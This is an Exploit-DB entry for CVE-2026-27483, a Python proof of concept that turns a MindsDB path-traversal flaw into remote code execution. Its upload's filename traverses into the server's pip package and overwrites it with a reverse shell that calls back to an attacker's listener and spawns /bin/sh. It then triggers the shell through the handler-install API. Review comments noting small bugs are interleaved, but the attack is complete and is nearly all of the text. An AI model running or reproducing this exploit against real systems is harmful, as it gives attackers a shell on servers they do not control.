MindsDB 25.9.1.1 - Path Traversal

EDB-ID:

52547




Platform:

Multiple

Date:

2026-05-04


# Exploit Title: MindsDB 25.9.1.1 - Path Traversal
# Date: 06-03-2026
# Exploit Author: Lohitya Pushkar (thewhiteh4t)
# Vendor Homepage: https://mindsdb.com/
# Software Link: https://github.com/mindsdb/mindsdb
# Version: < 25.9.1.1
# Tested on: Arch Linux
# CVE : CVE-2026-27483
# Original Advisory: https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
# Vulnerability Discovery: XlabAITeam

import argparse
import random
import re
import string
import sys

import requests
from packaging.version import Version

# Relative path used as the multipart *filename* of the uploaded file (see the
# `infile` tuple further down). It hard-codes a python3.10 site-packages
# directory; the version check below tells the operator to edit this value
# manually for targets that may run another interpreter version.
PIP_PATH = "../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
# Handler name used in the final POST to /api/handlers/<HANDLER>/install.
HANDLER = "anomaly_detection"  # query /api/handlers/ -> not installed handlers

# Text printed once at start-up, before any network request is made.
BANNER = """
-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)
"""

# Script body. Everything runs at import time inside one try block so that any
# unexpected error is reported by the `except Exception` handler at the bottom.
# Only run this against systems you are explicitly authorized to test.
try:
    # Command-line options. No `type=` is given, so every value (including the
    # ports) stays a string. `-lh`, `-u` and `-p` have no default and are None
    # when omitted.
    parser = argparse.ArgumentParser()
    parser.add_argument("-rh", default="127.0.0.1", help="Target host")
    parser.add_argument("-rp", default="47334", help="Target port")
    parser.add_argument("-lh", help="Listener host")
    parser.add_argument("-lp", default="4444", help="Listener port")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    rhost = args.rh
    rport = args.rp
    lhost = args.lh
    lport = args.lp
    user = args.u
    pswd = args.p

    # The target is always addressed over plain http.
    base_url = f"http://{rhost}:{rport}"

    print(BANNER)
    print(f"[>] Target   : {base_url}")
    print(f"[>] LHOST    : {lhost}")
    print(f"[>] LPORT    : {lport}\n")

    def login(username, password):
        """POST the credentials to ``/api/login`` and return the token.

        Returns the ``token`` field of the JSON response when the status code
        is 200 and the response text contains the substring ``token``.
        Otherwise prints the status code and response body and returns None.
        """
        r = requests.post(
            f"{base_url}/api/login", json={"username": username, "password": password}
        )
        if r.status_code == 200 and "token" in r.text:
            token = r.json().get("token")
            print("[+] Login successful!")
            return token
        print("[!] Login failed : ", r.status_code)
        print(f"---\n{r.text}\n---")
        return None

    # NOTE(review): none of the requests calls in this script pass `timeout=`,
    # so an unresponsive target can block the script indefinitely.
    print("[*] Checking status...\n")
    r = requests.get(f"{base_url}/api/status")

    # Anything other than 200 from the status endpoint aborts the run.
    if r.status_code != 200:
        print("[-] Status code :", r.status_code)
        print(f"---\n{r.text}\n---")
        sys.exit()

    # The status document is expected to carry the version string and a nested
    # auth flag; a missing key raises KeyError, reported by the handler below.
    status_json = r.json()
    ver = status_json["mindsdb_version"]
    auth = status_json["auth"]["http_auth_enabled"]

    print(f"[*] MindsDB Version : {ver}")
    auth_headers = {}

    # Drop everything from the first ASCII letter to the end of the string
    # before handing the remainder to packaging's Version parser.
    ver_clean = Version(re.sub(r"[a-zA-Z].*$", "", ver))
    # Version gate: stop for releases older than 25.4.1.0 (PIP_PATH may not
    # match the interpreter) and for releases at or above 25.9.1.1 (patched).
    if ver_clean < Version("25.4.1.0"):
        print(
            f"[!] Version {ver} < 25.4.1.0 — may use Python 3.8/3.9, PoC targets 3.10, manually edit PIP_PATH and try again."
        )
        sys.exit(0)
    if ver_clean >= Version("25.9.1.1"):
        print(f"[!] Version {ver} is patched (>= 25.9.1.1). Aborting.")
        sys.exit(0)

    if auth:
        # NOTE(review): the message below names --username/--password, but the
        # parser above only defines the short flags -u and -p.
        if not user or not pswd:
            print("[!] Auth is enabled. Provide --username and --password.")
            sys.exit()
        token = login(user, pswd)
        if not token:
            sys.exit()
        # The token is sent as a Bearer credential on the later requests.
        auth_headers = {"Authorization": f"Bearer {token}"}
    else:
        print("[*] Auth disabled — proceeding unauthenticated")

    # Text of the Python file that gets uploaded: it connects a TCP socket to
    # lhost:lport, duplicates it onto fds 0/1/2 and spawns /bin/sh. Line
    # endings are rewritten to CRLF after formatting.
    # NOTE(review): `-lh` has no default, so `lhost` is None when the flag is
    # omitted and `lhost.strip()` raises AttributeError here. That is caught by
    # the generic handler below, i.e. only after the status/login requests
    # have already been sent.
    shell_pl = f'''#!/usr/bin/env python3

import os,pty,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost.strip()}",{lport.strip()}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
'''.replace("\n", "\r\n")

    # Random 8-letter lowercase name used both in the URL and the form fields.
    fname = "".join(random.choices(string.ascii_lowercase, k=8))

    payload = {"name": fname, "source": fname, "source_type": "file"}

    # Multipart part "file": (filename, content, content type). The filename is
    # the relative PIP_PATH string rather than a plain file name.
    infile = {"file": (PIP_PATH, shell_pl, "text/plain")}

    print("[*] Uploading payload :", fname)
    pr = requests.put(
        f"{base_url}/api/files/{fname}",
        data=payload,
        files=infile,
        headers=auth_headers,
    )

    # NOTE(review): HTTP 400 is the only status treated as success here, and
    # every other status (including 200) aborts. Presumably the server rejects
    # the upload only after the file has been written — confirm against the
    # advisory.
    if pr.status_code == 400:
        print("[+] Payload uploaded!")
    else:
        print("[-] Payload upload request :", pr.status_code)
        print(f"---\n{pr.text}\n---")
        sys.exit()

    # Final request: ask the server to install HANDLER. The response `r` is
    # not inspected, so the script ends silently whatever the outcome.
    print("[*] Triggering payload...")
    r = requests.post(
        f"{base_url}/api/handlers/{HANDLER}/install", json={}, headers=auth_headers
    )

# sys.exit() raises SystemExit, which is not an Exception subclass, so the
# early exits above pass through this handler untouched.
except Exception as exc:
    print("[-] Exception :", exc)
# KeyboardInterrupt is likewise outside Exception and is handled separately:
# Ctrl-C exits quietly without a traceback.
except KeyboardInterrupt:
    sys.exit()